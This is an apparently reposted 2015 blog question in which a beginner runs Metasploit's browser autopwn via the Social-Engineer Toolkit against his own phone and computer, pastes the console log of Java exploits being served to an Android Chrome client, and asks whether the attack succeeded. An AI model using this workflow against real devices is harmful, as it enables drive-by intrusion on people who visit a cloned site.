mardi 13 janvier 2015

SET tool autopwn website type penetration



I tried to hack my second computer and phone in my local network. I am not very experienced so instead of picking the particular options and payloads i just pressed autopwn to use them all instantly. What i actually get now is in the code below, but i am not sure if i achieved anything? I configurated IPs, cloned website etc and this what i see now: And by the way, when i closed it all i saw the message "exiting and cleaning all exploits" does that mean the phone is clean anyway? or should i give it a factory reset to feel safe now?



[*] Starting the payload handler...

[*] --- Done, found 21 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://ift.tt/1hEqP8r
[*] Server started.
[*] 192.168.1.102 browser_autopwn - Handling '/'
[*] 192.168.1.102 browser_autopwn - Handling '/?sessid=QW5kcm9pZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOjM5LjAuMjE3MS45Mzo%3d'
[*] 192.168.1.102 browser_autopwn - JavaScript Report: Android:undefined:undefined:undefined:undefined:en-US:armle:Chrome:39.0.2171.93:
[*] 192.168.1.102 browser_autopwn - Responding with 7 exploits
[*] 192.168.1.102 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102 java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102 java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102 java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102 java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102 java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.102 java_verifier_field_access - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102 java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102 java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.102 java_verifier_field_access - Generated jar to drop (5507 bytes).
[*] 192.168.1.102 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102 java_jre17_provider_skeleton - handling request for /DkeFLS
[*] 192.168.1.102 java_jre17_provider_skeleton - handling request for /DkeFLS/

msf auxiliary(browser_autopwn) >




Aucun commentaire:

Enregistrer un commentaire